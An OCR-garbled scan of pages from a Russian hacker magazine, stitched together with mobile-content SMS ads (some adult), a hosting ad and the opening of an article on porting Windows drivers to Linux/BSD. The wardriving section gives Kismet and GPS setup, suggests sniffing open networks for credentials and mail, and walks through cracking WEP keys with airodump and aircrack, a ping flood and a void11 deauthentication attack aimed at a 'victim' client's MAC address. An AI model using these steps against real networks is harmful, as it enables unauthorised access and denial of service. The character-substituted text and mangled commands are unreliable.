доры включают в свои продукты возможность отключения такой рас- 
сылки. Польза от этого довольно сомнительная: как только легитимный 
клиент инициирует передачу данных, он все равно «светит» 35Ю, и 
Кізтеі может с легкостью это обнаружить. 

Настройка Кізтеі весьма проста. В минимальном варианте — указание поль- 
зователя, с правами которого будем запускать Кізтеі и драйвера карты. 

# ѵі /изг/іосаі/еіс/кізтеісопі 
зиісіи$ег=Іоха 

Запускать сканер полностью от гооі небезопасно, вот почему нам потре- 
буется указать пользователя, до прав которого Кізтеі будет понижать 
привилегии, после того как будет запущен от рута. 

5оигсе=гаШо1ар_Ь50,аШО,аШего5 

Используемый драйвер задается в формате «драйвер, имя_интерфей- 
са,алиас» и предписывает сканеру загружать соответствующие драйве- 
ра для данного интерфейса, а в дальнейшем оперировать с этой за- 
писью под определенным алиасом. Основная платформа разработки 
Кізтеі — І_іпих, и, в случае использования этой ОС, типом карты может 
быть ргізт2, огіпосо, аІГіегоз, то есть любой поддерживаемый драйвер 
(обратись на страницу Кізтеі за информацией). 

Для ВЗЭ существует универсальный враппер под названием Васііоіар. 
Я запускаю Кізтеі на РгееВЗЭ, потому и указал гасПоІар_ЬзсІ_Ь. Так как 
карточка у меня на чипсете АІГіегоз, то и интерфейс — аІГЮ. Все это наз- 

авчии & ■ ф *а о.і ттт* <г~ 




з: 



снифаем «беспроводной» трафик 




список обнаруженных беспроводных сетей 



вано как аІГіегоз. Кстати, поддержка гасііоіар появилась лишь во 
РгееВЗО 6.х/7.х, ІМеІВЗО-сиггепІ и в ОрепВЗЭ, начиная с версии 3.7. Об 
обновлении операционки мы уже говорили. 

епаЫезоигсез=аШего5 

Эта запись активирует вышеописанную конфигурацию. Так, если ис- 
пользуются разные карты, можно указать записи вида зоигсе и вклю- 
чать их по мере необходимости. 

В принципе, Кізтеі уже готов к работе. Но мы пойдем дальше. В каче- 
стве реакции на каждую найденную сеть мы научим Кізтеі шедевраль- 
ным голосом произносить всю информацию о сети. Для этого мы интег- 
рируем его с «программой-говорилкой» Резііѵаі. 

$ ссі /изг/роііз/аисііо/іезііѵаі 

# таке іпзіаіі сіеап 

# ѵі /изг/іосаі/еіс/кізтеісопі 
зреесМгие 

ІезііѵаІ=/изг/ІосаІ/ЬіпЛезііѵаІ 

зреес!і_Іуре=паІо 

зреесІп_епсгур1;есІ=Ые\л/ ѵісііт ТоипсІ, з.з.і.сі. %з, сііаппеі %с, сіатп, іі із 
епсгуріеб. 

зреесІі_ипепсгур1;есІ=Ые\л/ ѵісііт ТоипсІ, з.з.і.сі. %з, сііаппеі %с, 
ѵѵооИоо, іі із ореп. 

Если требуется передавать данные на вход другой программе (напри- 
мер, ЮЗ), можно воспользоваться опцией Шо. 

Еще одна интересная возможность — интеграция с ОРЗ. Исколесив 
полгорода и обнаружив несколько сотен сетей, было бы полезно сопос- 
тавить географические координаты точек доступа с картой города, что- 
бы знать, куда возвращаться ;). Для ІІпіх-Ііке систем написан специаль- 
ный демон для общения с ОРЗ-устройством, дрзсі (дрзсі. зі.пеі). Все, что 
тебе нужно, — это устройство (с ІІЗВ или ЗегіаІ интерфейсом), поддер- 
живаемое демоном дрзсі. Включить поддержку ОРЗ в Кізтеі можно оп- 
цией дрз=1ше в кізтеі.сопі. Для визуализации полученной информации 
в состав Кізтеі входит утилита дрзтар. Она способна отображать 
маршрут, зону покрытия сети, сведения о сети и накладывать все это на 
карту местности. Необходимые карты можно скачать из Сети. 
Допустим, вардрайвер прокатился по местности, обнаружил большое 
количество сеток, и теперь ему хочется посмотреть, где располагались 
точки доступа с привязкой к конкретной карте. Тогда он запускает: 

$ дрзтар -3 4 -теігіс ОРЗІод 

Флаг -3 определяет, откуда дрзтар попытается стянуть карту местнос- 
ти. Флаг -теігіс обозначает, что дрзтар будет скачивать карты в метри- 
ческой системе (по умолчанию в нем используется измерение в милях). 
Из остальных возможностей дрзтар: 

— сігаѵѵ-ігаск — отслеживание маршрута вардрайвера; 
-сігаѵѵ-роѵѵег-гоот — отображение силы сигнала; 

-бгаѵѵ-ІедепсІ — отображение информации о сетях. 

Завершив настройки, перейдем в каталог, открытый на запись 
зиісіизег'у, и запустим Кізтеі: 

$ ей Лтр 

# кізтеі 

Запустится сервер (по умолчанию слушает 127.0.0.1:2501), а затем и 
клиент, который автоматически подсоединится к серверу. Обнаружен- 
ные точки доступа тут же высветятся со всей необходимой информаци- 
ей: имя и тип сети, наличие шифрования, канал, количество пойманных 
пакетов, ІР-диапазон. Клиент имеет удобный консольный псигзез-интер- 
фейс. Основные ключи: 

е — вывести список серверов Кізтеі 

(в нашем случае он единственный, запущенный локально). 

2 — убрать все панели, кроме списка сетей (чтобы ничего не отвлекало ;). 

Повторное нажатие возвращает спрятанные панели, 
т — включить/выключить звук. 

3 — отсортировать список сетей. По умолчанию найденные сети 

отображаются в режиме аиІоШ. Сортировать можно по времени 
появления сети, количеству пакетов, идентификаторам, 
либо силе сигнала. 

с — удобная возможность просмотреть всех клиентов сети 
(помимо прочего, МАС-адрес и ІР-адрес). 








Аде оГ Негое5: Армия Мрака 
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Рігга Мадпаіе 





КеаІ Тоигпатепі 




Ки55іап Зіаг - Кгузйпа 




БИагк Різіітадесісіоп 




БЫгІііг 




Бумер 






Хочешь узнать, какие игры подходят для твоего телефона? Отправь 5М5 ЗАѴА 
. на номер 9988 (для абонентов «Мотив» 9955) (0,15 у.е. без НДС) или зайди на 

Код загрузки: 36149 

Над миром вновь нависла угроза подземного мрака, 
мертвецы встали из своих могил, чтобы очистить землю от 
живых, ими движет вечный голод и чья-то злая воля. 

Тебе предстоит спасти человечество от порождений тьмы. 
Путь героя непрост, его подстерегают опасные приключения 
и сложные задания, но отважные воины готовы 
присоединиться к твоей армии, а те, кто на светлой стороне, 
укажут правильный путь. Магия и артефакты надежно 
послужат тебе. Спаси мир от нечисти! 

Код загрузки: 36414 
СЬгізІітаз СЫХ - это увлекательная аркадная игра, в 
которой Вам потребуется открывать скрытые изображения 
прекрасных девушек в самых сексуальных рождественских 
нарядах. Вам нужно будет заполнять игровое поле и в 
то же время избегать различных врагов. Сіігізіітаз СЫХ 
содержит 40 уровней, сложность их увеличивается по 
мере прохождения игры. В уровнях содержатся 9 разных 
картинок с рождественскими девушками. Джентльмены, 
насладитесь самой эротической рождественской игрой для 
мобильных телефонов! И не попадитесь! 

Код загрузки: 36415 

Стань на время владельцем пиццерии и зашиби кучу денег! 
Пусть конкуренты в ужасе закрывают свои заведения и 
подписывают документы о банкротстве. Теперь твое время 
стать настоящим магнатом на рынке пиццы! 

Стать известным не просто, ведь есть опасные конкуренты 
и бандиты, неблагоприятные районы и некультурные 
посетители, отпугивающие покупателей. Необходимо 
принимать правильные решения, чтобы не допустить 
провала. 

Код загрузки: 36416 

Это настоящий командный экшен для мобильного телефона. 
Не важно, какая игра вам больше по душе: Десматч или 
Захват флага, - в любом типе игры вы сможете использовать 
лифты, поезда и космические мотоциклы с мощными 
бластерами. Качественный искусственный интеллект 
составит вам достойную конкуренцию, а продуманные 
уровни заставят вас выбирать подходящую тактику в 
зависимости от ситуации. Убивайте соперников, коопери- 
руйтесь с напарником. И пусть трепещут "боты" - покажите, 
кто главный на арене! 

Код загрузки: 36189 

Киззіап Зіагв. Волнующая и обаятельная супермодель 
Кристина из России. Вы будете потрясены ее красотой, Вы 
не сможете противостоять ее страсти, Вы будете очарованы 
ее соблазнительной фигурой. Сегодня она будет позировать 
специально для Вас. 

Киззіап 51агз - это великолепное качество слайдов, 
волшебное шоу соблазнов с беспрецендентно удобным 
управлением и великолепными возможностями. 
Соблазнительная и волнующая русская супермодель 
Кристина силой своей страсти очарует Вас. 

Код загрузки: 36413 

Жизнь водного мира, какая она есть - ешь быстро, или 
умри молодым! Ты маленькая акула, у которой есть шанс 
стать большой и неуязвимой. Кушай разноцветных рыбок и 
разнообразные бонусы, закусывай вкусными аквалангистами, 
убегай от вооруженных до зубов ловцов акул, которые, 
кстати, тоже годятся в пищу. Главное, помни - есть надо 
быстро и опасаться тех акул, что больше тебя по размерам. 
Впервые в одной игре тебе доступны ее две разные версии: | 
"ВІіагк Різіітадесісіоп" и "ЗІіагк Еѵоіийоп"! 

Код загрузки: 36150 

Самая веселая бродил ка для мобильных телефонов позволит 
Вам погрузиться в борьбу с коварным диктатором. Остановите 
безумца и его солдат. Помогите разведчику собрать все 
тайны и секретные бумаги. 

Скучать не придется, ведь предстоит пройти 15 уровней в 
3 совершенно разных мирах, протя-женностью более 300 
экранов. Горы разнообразных противников, мощное оружие 
для их уничтожения и отличная физика игрового движка - 
вот чем отличается "Зйгіііг" от других подобных игр. 

Код загрузки: 36147 
...По ночным улицам Москвы мчится черный ВМѴѴ, уходящий 
от погони. Цепь роковых событий с разборками и стрельбой 
поставила четырех героев - четырех друзей - вне закона. И 
в жизни без правил им нет пути назад... 

Тебе предстоит уходить от погони, сопровождать 
дальнобойщиков, встревать в разборки и отстреливаться. 
Даже на дороге, которую лучше не выбирать, приходится 
постоянно доказывать, что круче тебя нет никого. А как 
это сделать - вспоминай фильм, он будет самой лучшей 



Цветные картинки 




Л 





подсказкой. 

Инструкция по закачке: 

1) Создайте 5М5-сообщение, в котором укажите код загрузки игры; 

2) Отправьте созданное 5М5-сообщение на короткий номер 9955*; 

3) Дождитесь прихода ответного 5М5-сообщения, содержащего ссылку на 
игру; 

4) Используя ѴѴАР браузер Вашего телефона, перейдите по полученной 
ссылке и осуществите загрузку и установку выбранной Вами игры. 

Стоимость игры: $2.5/75 руб. (без НДС) 



Получи убойный анекдот! 



9955 



* для абонентов «Мотив» 
юроткий номер 6655 




і мшіэдшіі Я 9988 

ічрмік ѵінятн пкониянир? Птппякн А ... _ 



Хочешь узнать окончание? Отправь А 
9573 на номер 9988* 



* Для абонентов «Мотив» 
короткий номер 6688 

Отправь А на номер 9988* и читай самые убойные анекдоты на любые темы: про военных, 
о сексе, о программистах, автомобильные и многие другие. 

Хочешь получить АНЕКДОТ ДЛЯ ВЗРОСЛЫХ - отправь зтз А Ай на номер 9988*! 

Если отправишь А ТН на номер 9988*, получишь анекдот из рубрики «Черный юмор»! 

Стоимость $0,15/4,5 рубля (без НДС) 




Запретных тем НЕТ! 



Отправь зтз-сообщение ЕКОТ на номер 9988. В ответ ты 
получишь ссылку на эротический рассказ. 

Для любителей экзотики все темы на ѵѵѵѵѵѵ.тоЬіІе.геІах.ги 



Стоимость зтз - 0,15 у.е. без налогов 
Внимание: необходимо подключение услуги 
ѴѴАР/СРК5 

Лицам до 18 лет пользоваться сервисом 
запрещено 






НЕ^ИЭ 






36120 36122 36182 36121 36152 36169 




Исполнитель / Название 


Полифония 


(ІМокіа) 


Монофония 

(Зіетепз) 


(ЕМ5) 


АВВА / Нарру ЫеѵѵУеаг 


36422 


3642201 


3642203 


3642202 


АхеІ Р / С гагу Ргод 


36123 


3612301 


3612303 


3612302 


С гагу Ргод / Рорсогп ыеѵѵ 


36197 


3619701 


3619703 


3619702 


РаѵісІ СиеПа / ТНе ѴѴогІсІ із Міпе 


36115 


3611501 


3611503 


3611502 


ЦересИе Мосіе / Ргесіоиз ЩѴѴ 


36200 


3620001 


3620003 


3620002 


Сеогде МісІіаеІ / І_аз1 Сіігізітаз 


36424 


3642401 


3642403 


3642402 


Лпдіе ВеІІз 


36423 


3642301 


3642303 


3642302 


МоЬу / Ш Ме Цр 


36133 


3613301 


3613303 


3613302 


Казтиз / N 0 Реаг 


36196 


3619601 


3619603 


3619602 


КоЬЬіе ѴѴіІІіатз / Тгірріпд 


36195 


3619501 


3619503 


3619502 


Тіто Мааз &Вгіап Моіко / Рігзі йау 


36125 


3612501 


3612503 


3612502 


Братья Гримм / Кустурица N1^- 


36193 


3619301 


3619303 


3619302 


В лесу родилась елочка 


36421 


3642101 


3642103 


3642102 


Венгеров 8і Федорофф / Кавказская пленница 


36135 


3613501 


3613503 


3613502 


Дельфин / Серебро 


36199 


3619901 


3619903 


3619902 


Дискотека Авария / Новогодняя 


36417 


3641701 


3641703 


3641702 


Корни / 25 Этаж 


36126 


3612601 


3612603 


3612602 


Ку кры никсы / Звезда( 9 рота) ИШ 


36192 


3619201 


3619203 


3619202 


Тату / АН АЬоиІ ІІз 


36191 


3619101 


3619103 


3619102 


м/ф Ну погоди / Песня Зайца и Волка 


36420 


3642001 


3642003 


3642002 



Звуки 



Только для телефонов: Батзипд - все многоголосные модели, 
АІсаІеІ 535/735, ЗопуЕгісззоп - все многоголосные модели, 
ІМокіа 3650/3660/7650/6600/6230/ІМ-Саде, Задет МуХ. 



Женский оргазм 


36142 


Свист 


36408 


Демонический смех 


36407 


Гром 


36143 


Индейские барабаны 


36137 


Голос робота 


36146 


Звонок старопэ телефона 


36138 


Радостный крик 


36139 


Воздушная тревога 


36410 


Говорящая утка 


36409 



Инструкция 



Для абонентов: МТС, «Билайн», «Мегафон», Теле2, Реком, Цифровая Экспансия, 
Байкалвестком, Енисейтелеком, Индиго (Архангельск, В. Новгород, 
Коми), «Мотив», НТК, Уралсвязьинформ, Ульяновск-СЗМ, 



ОЫ (Татинком-Т), ОІМ-С5М (Саратов) 



Для получения мелодии или картинки пошлите 5М5-сообщение, содержащее код на короткий номер 9922 (* для 
абонентов «Мотив» короткий номер - 6622). Вам придет сообщение, содержащее мелодию или картинку (либо ѵѵар- 
ссылку). Ссылка действительна в течение 24 часов. В случае ошибочного запроса, услуга будет считаться оказанной. 
Для получения полифонических мелодий, звуков или цветных картинок необходимо подключить услугу ѴѴАР/СРК5 у 
своего оператора. 

Полифонические мелодии доступны для многоголосных телефонов. 

Цветные картинки доступны для телефонов с цветным экраном. 

Монофонические мелодии доступны для одноголосных телефонов ІМокіа и Затзипд. 

ЕМ6-мелодии доступны для одноголосных телефонов: АІсаІеІ, Моіогоіа, Рапазопіс, РапІесМ, РЫІІірз, Зіетепз, 
ЗопуЕгісззоп. 

СТОИМОСТЬ запроса у операторов Байкалвестком, Енисейтелеком - $0,6 (без НДС); МТС, «Билайн», «Мегафон», Теле2, 



Реком, Цифровая Экспансия, НТК - $0,75 (без НДС) (для игр - $2,5); Ярославль-СЗМ, Ульяновск-С5М, ОЫ (Татинком-Т), 

и 

Служба поддержки тоЬіІе.5иррог(@гёІах.ги. 



р - $2,5); Ярое 

Индиго (Коми, Архангельск, В. Новгород) - 18 руб. (без НДС); ОІМ-С5М (Саратов), Астрахань-С5М, «Мотив» - 23 руб. (без 
НДС), Уралсвязьинформ - 26 руб. (без НДС) (для игр - 75 рублей). Входящие 5М5 - бесплатно. 



5 ООО «Первое Музыкальное Издательство», «Ворнер/Чаппел», «АНО «НФА», МИ «Русский шансон», «Тухманов Д.Ф.», 
«Визбор Ю.И.», «Митяев О. Г.», «ЕМІ Мизіс РиЫізбіпд», «5ВА Ми5іс РиЫізНіпд», © Мегалайнер, © ЗАО «Си Ди Лэнд+»/ 
СО І_апсі Ресогб5, ЗАО «ШнурОК», © Разрибп СІиЬ, ООО «Русские Мобильные Развлечения». Все права защищены, 
торговые знаки являются собственностью их владельцев. 

Лицензия №33353 выдана Федеральной службой по надзору в сфере связи 
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І_ — выключить сНаппеІ Норріпд, «залочив» его на заданном канале. 

То есть не искать сети на других каналах. 

Н — вернуться к режиму сНаппеІ Иорріпд. 
і — детальная информация по выбранной сети. 

Общая информация о сети состоит из идентификатора (ЗЗЮ), типа се- 
ти (чаще всего это будет А — Ассезз Роіпі), наличия шифрования (ѴѴ), 
канала (СИ), диапазона адресов (ІР Вапде), а также различных флагов 
(подробнее о них можно прочесть во встроенной подсказке, кнопка И). 
Каждая сеть имеет цветовое кодирование, цвет сети определяется ее 
настройками. 

По статистие чаще всего вардрайвер обнаруживает «желтые» и «крас- 
ные» (согласно дефолтному цветовому кодированию Кізтеі) сети — это 
сети без шифрования и точки доступа с настройками по умолчанию (у 
которых не изменен ни ІР-адрес, ни ЗЗЮ!). Обнаружив такие сети, вард- 
райвер не тушуется и энергично запускает один из самых продвинутых 
сетевых сниферов/анализаторов протоколов, ЕІПегеаІ: 

$ ссі /изг/роіІз/пеѴеІііегеаІ 
# таке іпзіаіі сіеап 

Настроив снифер на беспроводной интерфейс и указав простейшие 
фильтры, можно часами медитировать на поток трафика, вылавливая 
«вкусные» пакеты с аутентификационными данными, почтовую переписку 
и все то, что попадает под термин «конфиденциальная информация» ;). 
Но настоящий вардрайвер, скорее всего, не будет заниматься подобны- 
ми вещами. Для него представляет интерес сам факт обнаружения сети 
и возможность к ней подключиться. Правда, мы же не хулиганы какие ;). 
Для подключения очень пригодится направленная антенна, без нее мо- 
жет возникнуть неприятная ситуация, когда сеть обнаружена, и пакеты 
перехватываются, а вот подключиться мощности сигнала не хватает. 



[ключ на старт] Но что делать, если Кізтеі окрасил сеть в зеленый 
цвет, что означает наличие шифрования. Если в графе ѴѴ стоит значе- 
ние У — это значит, что сеть защищена ѴѴЕР'ом, соответственно, мож- 
но попытаться взломать ключ. 

Как известно, в протоколе ѴѴЕР (ѴѴігесІ Ециіѵаіепі Ргіѵасу) существуют фун- 
даментальные уязвимости (подробный «разбор полетов» можно найти в 
статье «Воздушный дуршлаг», X #2/2005), и после их обнаружения появи- 
лось множество утилит, взламывающих ключ на основе анализа перехва- 
ченных пакетов. Вместе с методами взлома совершенствовались и утили- 
ты (первое поколение «взломщиков ѴѴЕР», такие программы, как бѵѵер- 
битр и аігзпогі, требовали чуть ли не гигабайты трафика), самый продвину- 
тый и самый быстрый алгоритм взлома реализован в наборе утилит аігсгаск 

(ѵѵѵѵѵѵ.сг0.пе1:8040/сосІе/пеіѵѵогк/аіг- 
сгаскГ). В этот набор входят утилиты 
аігосіитр для сбора пакетов, аігеріау 
для внедрения пакетов в сеть, аіг- 
сгаск для непосредственного взло- 
ма ключа и аігсіесар — бонус для 
расшифровки ѴѴЕР/ѴѴРА дампов. 
Аігсгаск работает существенно 
быстрее, чем его предшественни- 
ки. Взлом ключа — лишь дело 
времени, для успешной атаки не- 
обходимо накопить достаточное 




модный инструмент вардраиверов 



количество пакетов с векторами инициализации (IV, всю теорию ѴѴЕР 
можно прочесть в вышеупомянутой статье). Так, аігсгаск'у требуется 
около 500000 пакетов для взлома 128-битного ключа, что составляет 
несколько часов работы хорошо загруженной беспроводной сети. В 
простейшем случае можно просто пассивно копить пакеты, запустив 
аігосіитр. К сожалению, аігосіитр (как и аігеріау) исключительно 
□пих-специфичны, и не нашлось пока добровольца портировать эти 
полезные утилиты под ВЗЭ. 

Ловим пакеты на одиннадцатом канале и пишем дамп в битріііе: 

# аігосіитр еіііі сіитріііе 11 

А затем натравливаем на дамп аігсгаск: 

$ аігсгаск сІитрТМе.сар 

Замечу, что аігсгаск умеет взламывать не только ѴѴЕР, но и ѴѴРА-Р5К 
ключи. Если пакетов с IV собрано достаточно, через некоторое время 
аігсгаск поздравит тебя надписью КЕѴ РОІІЫО! 

Единственная проблема такого пассивного метода — процесс может 
идти очень медленно. Чтобы быстрее взломать ключ, а значит, нако- 
пить необходимое количество пакетов с IV, нужно заставить сеть ге- 
нерировать такие пакеты. Если имеется доступ к какой-нибудь маши- 
не в сети, самый действенный способ — устроить ІСМР-шторм ко- 
мандой ріпд -і. В таком случае требуемое количество IV накаплива- 
ется за минуты ;). Если подобной возможности нет, следует прибег- 
нуть к более изощренным методам. 

Например, можно заставить клиентов беспроводной сети генерировать 
трафик путем постоянного переподключения к АР, то есть устроить так 
называемую сІеаиІП аЛаск. Посылать клиентам деаутентификационные 
фреймы будем с помощью утилиты ѴоісІІІ (ѵѵѵѵѵѵ.ѵѵізес.пеі/ѵоісіі И). Эта 
тулзенка способна устроить настоящий ЭоЗ, флудя беспроводные сети 
деаутентификационными пакетами. Кроме этого, она умеет флудить и 
сам АР, посылая ему поддельные аутентификационные запросы от раз- 
ных адресов. И опять стоит, к сожалению, упомянуть, что работает 
ѴоісІІІ только под І_іпих, причем для его функционирования требуется 
установить Ыпих НозІАР драйвер (Нозіар.ерііезиі). 

Как ты помнишь, Кізтеі может показать нам список клиентов сети. Нам 
понадобятся их МАС-адреса, а также МАС-адрес точки доступа. После 
этого запускаем ѴоісІ1 1 : 

# іѵѵсопТід ѵѵІапО тосіе тазіег 

# іѵѵргіѵ ѵѵІапО ііозіарсі 1 

# ѵоісіі 1_репеІгаІіоп -Э -з <МАС-адрес клиента-жертвы> -В <МАС-ад- 
рес АР> ѵѵІапО 

Результат этой атаки — деаутентификация клиента, который вынужден 
будет постоянно подключаться к сети, «светя» нужными нам IV. 

Чтобы не превратить пеіѵѵогк в поіѵѵогк, можно воспользоваться более 
«джентельменским» способом — атакой геріау аНаск с использованием 
утилиты аігеріау, ловя легитимные пакеты и перепосылая их снова и снова. 

[у вас вся спина синяя] Разумеется, ѴѴі-Рі сетями беспроводные ша- 
лости не ограничиваются. В следующий раз мы поговорим об арсенале 
юниксоида-блюджекера и превратим нашу ІІпіх-систему в грозное ору- 
жие охотника за синими зубами © 
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используем анализатор сетевых пакетов Ісрсіитр 







РБК 

ХОСТИНГ 

ЦЕНТР 



іо% 

скидка 




АРЕНДА ВЫДЕЛЕННЫХ СЕРВЕРОВ 





100 е 255 



У-е. 

мес. 



ІхСеІегоп 2.8СНг 
512МЬ РАМ 
1206Ь 8АТА НЮй 



ІхСеІегоп 2.8СНг 

ІСЬРАМ 

ІбОСЬЗАТАНОй 



1хРепііит4 2.8СНг 

ІСЬРАМ 

ІбОСЬЗАТАНОй 



2хХеоп 2.8СН2 
2СЬ РАМ 
36СЬ ЗСЗІ НРО 



Почему стоит выбрать Хостинг-Центр РБК? 

Все очень просто: 

Дата Центр АРС ІпІтаЗІгиХиге™ 
Современное серверное оборудование 
Отсутствие установочной платы 
Высокая скорость соединения с Іпіегпеі 
Круглосуточная техническая поддержка 
Низкая абонентская плата 



Более подробную информацию 
можно узнать 

по телефону клиентской службы 

+7 (095) 363-03-09 
или на сайте 
Нир://Но5ііпд.гЬс.ги 




ЮНИТЫ КРЕАТИФФ КОДИНГ [ІШІХОЮ] СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 
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Боевое искусство порти рования 

Турбо-перенос драйверов из ѴѴіпсІоѵѵз в Ыпих/ВЗО 



НЕСКОЛЬКО ЛЕТ НАЗАД СИТУА- 
ЦИЯ С ДРАЙВЕРАМИ ПОД ІЛЧІІХ И 
ВЗЭ БЫЛА ПРОСТО КАТАСТРОФИ- 
ЧЕСКОЙ. ПОДДЕРЖИВАЛОСЬ 
ЛИШЬ НЕБОЛЬШОЕ КОЛИЧЕСТВО 
УСТРОЙСТВ, И ЖЕЛЕЗО ДЛЯ ШЧІХ- 
МАШИН ПРИХОДИЛОСЬ ЗАКУПАТЬ 
ОТДЕЛЬНО. ТОГДА ІЛЧІІХ ЕЩЕ НЕ 



ВЫШЕЛ ИЗ СТАДИИ «КОНСТРУК- 
ТОРА» ДЛЯ ХАКЕРОВ, А ВЗО В ОС- 
НОВНОМ ИСПОЛЬЗОВАЛАСЬ НА 
СЕРВЕРАХ, ВСЕ ОБОРУДОВАНИЕ 
КОТОРЫХ СВОДИЛОСЬ К СЕТЕВОЙ 
КАРТЕ И ЗСЗІ-КОНТРОЛЛЕРУ. ДО 
СИХ ПОР ОДНИМ ИЗ ГЛАВНЫХ НЕ- 
ДОСТАТКОВ ІЛЧІХ-СИСТЕМ ЯВЛЯ- 



ЕТСЯ ОТСУТСТВИЕ НОРМАЛЬНЫХ 
ДРАЙВЕРОВ ПОД ВСЕВОЗМОЖНЫЕ 
«ВКУСНЫЕ» ЖЕЛЕЗКИ, С КОТОРЫ- 
МИ ѴѴІІЧЭ0ѴѴ5 СПРАВЛЯЕТСЯ БЕЗ 
ПРОБЛЕМ. НА САМОМ ДЕЛЕ ПРОБ- 
ЛЕМУ МОЖНО РЕШИТЬ, И ЭТА 
СТАТЬЯ РАССКАЖЕТ КАК 

I Крис Касперски ака мыщъх 



[виртуальные машины] Прежде чем ставить Ыпих/ВЗО, задумайся 
зачем, собственно, все это нужно? Если есть желание пощупать альтер- 
нативную систему, освоить средства разработки или компилировать ис- 
ходные тексты, то наилучшим выбором будет виртуальная машина, та- 
кая как, например, ѴМѴѴаге. Ребога Соге на ней, конечно, жутко тормо- 
зит (на Р-ІІІ 733 работать вообще невозможно), но ОеЬіап с КОЕ идет 
вполне нормально. Хочешь — разрабатывай программы, хочешь — чи- 
тай тап'ы. Еще и в игры типа Зіаг ѴѴагз можно поиграть. Никаких драй- 
веров в этом случае не потребуется, в смысле «никаких драйверов 
сверх того, что есть в любом нормальном дистрибутиве». Большинство 



разработчиков именно так и поступают. Как ни крути, а любой уважаю- 
щий себя ІІІМІХ-программист вынужден держать на компьютере десяток 
осей различных пород, чтобы тестировать свои программы на совмести- 
мость. На «живом» компьютере переключения между ними происходят 
только через перезагрузку, что не есть хорошо, а виртуальные машины 
переключаются, как карусель. 

Можно поступить и наоборот. Установить Ыпих/ВЗО как базовую систе- 
му, а ѴѴіпсІоѵѵз водрузить на виртуальную машину. Поскольку ѴМѴѴаге 
дает прямой доступ к СОМ/І_РТУІІЗВ портам, то подключение скане- 
ра/принтера/цифровой камеры к твоей машине уже не станет пробле- 




мой. С ней будет работать ѴѴіпсІоѵѵз! Базовая ІІМХ-машина в этом слу- 
чае получает в свое распоряжение все системные ресурсы, и падения 
производительности уже не происходит, но появляются другие пробле- 
мы. ѴѴіпбоѵѵз-приложения (например, игрушки) будут либо сильно тор- 
мозить, либо откажутся запускаться совсем, к тому же со всеми осталь- 
ными типами устройств, например, интегрированной ѴѴІ_АІ\І платой или 
видеокартой, ѴѴіпсІоѵѵз работать не сможет. А все потому, что ѴМѴѴаге 
представляет собой закрытый ящик, отгороженный от базовой операци- 
онной системы толстой стеной эмулятора. Вот если бы существовала 
возможность предоставить виртуальной машине полный доступ ко все- 
му физическому оборудованию, вот тогда бы... Готовься! Именно такой 
способ мы и собираемся описать! 

[два в одном] Начнем с простого, но до сих пор никем не решенного 
вопроса, то есть уже давно решенного, конечно, но совсем не так, как 
следует. Известно, что поддержка ІМТРЗ-разделов представляет огром- 
ную проблему. Драйвера, научившиеся писать на ЫТРЗ-раздел, появи- 
лись совсем недавно, да и то лишь затем, чтобы покрасоваться на выс- 
тавках. Для реальной работы они не годятся, потому что работают нес- 
табильно и несут на своем горбу кучу ограничений. Сжатые файлы, 
транзакции и куча других вещей все еще не поддерживается. К тому же, 
ЫТРЗ не стоит на месте и хоть и медленно, но совершенствуется. Мож- 
но ли, хотя бы теоретически, написать 100% совместимый драйвер, «пе- 
реваривающий» новые версии ІМТРЗ без участия программиста? Вопрос 
совсем не так наивен, каким кажется. Для чего нам корпеть над своим 
собственным драйвером, когда под рукой есть уже готовый — пМз.зуз. 
Если мы сумеем заставить его заработать под І_іпих, все проблемы ре- 
шатся сами собой. 

Да, на уровне ядра Ыпих/ВЗО отличается от ѴѴіпсІоѵѵз так же, как слоно- 
потам от крокодила. Различий очень много, но что-то общее между ними 
все-таки есть. И ѴѴіпсІоѵѵз, и Ыпих, и ВЗЭ работают на х86-процессорах в 
защищенном режиме, используют страничную организацию виртуальной 
памяти и взаимодействуют с оборудованием в строго установленном по- 
рядке (через иерархию физических и виртуальных шин). Высокоуровне- 
вые драйвера такие, например, как пйз.зуз, вообще не касаются обору- 
дования и содержат минимум системно-зависимого кода. Почему же тог- 
да драйвер от одной системы не работает в другой? Главным образом, 
потому что интерфейс между осью и драйвером в каждом случае разли- 
чен и еще потому, что драйвер использует библиотеку функций, экспор- 
тируемых системой, и эти функции у каждой системы свои. 

Перенести ѴѴіпсІоѵѵз-драйвер в Ыпих/ВЗО вполне реально! Для этого да- 
же не потребуется его исходный код. Достаточно лишь написать тонкий 
и несложный «переходник» между драйвером и операционной систе- 
мой, принимающий запросы и транслирующий их по всем правилами 
«этикета», а также перетащить библиотеку функций, необходимых 
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драйверу для работы. О, да! Для этого необходимо уметь программиро- 
вать! Для простых смертных пользователей такой рецепт совершенно 
не годится, но тут уже ничего не попишешь. Тем не менее перенести го- 
товый драйвер намного проще, чем переписать его с нуля. Как мини- 
мум, не потребуется проводить кропотливую работу по дизассемблиро- 
ванию оригинального кода, заменяющую собой поиск технической доку- 
ментации (которая либо совсем отсутствует, либо отдается только под 
подписку о неразглашении, зачастую запрещающее открытое распрост- 
ранение исходных текстов). К тому же, при выходе новых версий 
ѴѴіпсІоѵѵз-драйвера, процедура обновления Ыпих/ВЗО порта существен- 
но упрощается, просто скопировал поверх старого файла, и все. Но все 
это теория. Перейдем к деталям. 

Ядерная модель ѴѴіпсІоѵѵз І\ІТ и всех производных от нее операционных 
систем (как ѴѴіпсІоѵѵз 2000, ХР, 2003) достаточно проста. С «внешним» 
миром ядро связывает Диспетчер Системных Сервисов, «подключен- 
ный» к пісііі.сііі. Эта библиотека находится уже за «скорлупой» ядра и ис- 
полняется в пользовательском режиме. Диспетчер Системных Серви- 
сов, реализованный в піозкгпі.ехе, опирается на Вызываемые Интер- 
фейсы Ядра, часть которых реализована внутри самого піозкгпі.ехе, а 
часть — во внешних драйверах, к числу которых принадлежит Диспет- 
чер Электропитания. Определенный класс драйверов, называемый 
Драйверами Устройств файловой системы, находится в своеобразной 
«скорлупе» и взаимодействует с Диспетчером Системных Вызовов че- 
рез Диспетчер ввода-вывода, реализованный в піозкгпі.ехе! 

Ядро, на котором, как на фундаменте, держатся все вышеупомянутые 
компоненты, представляет собой совокупность низкоуровневых функ- 
ций, сосредоточенных... Правильно! В піозкгпі.ехе! Ниже находится 
только слой абстрагирования от оборудования, или сокращенно НАІ_ 
(Нагбѵѵаге АЬзІгасйоп І_еѵеІ). Когда-то у МісгозоК была идея разделить 
ядро на системно-зависимую и системно-независимую части, чтобы уп- 
ростить перенос ѴѴіпсІоѵѵз на другие платформы, но уже во времена ЫТ 
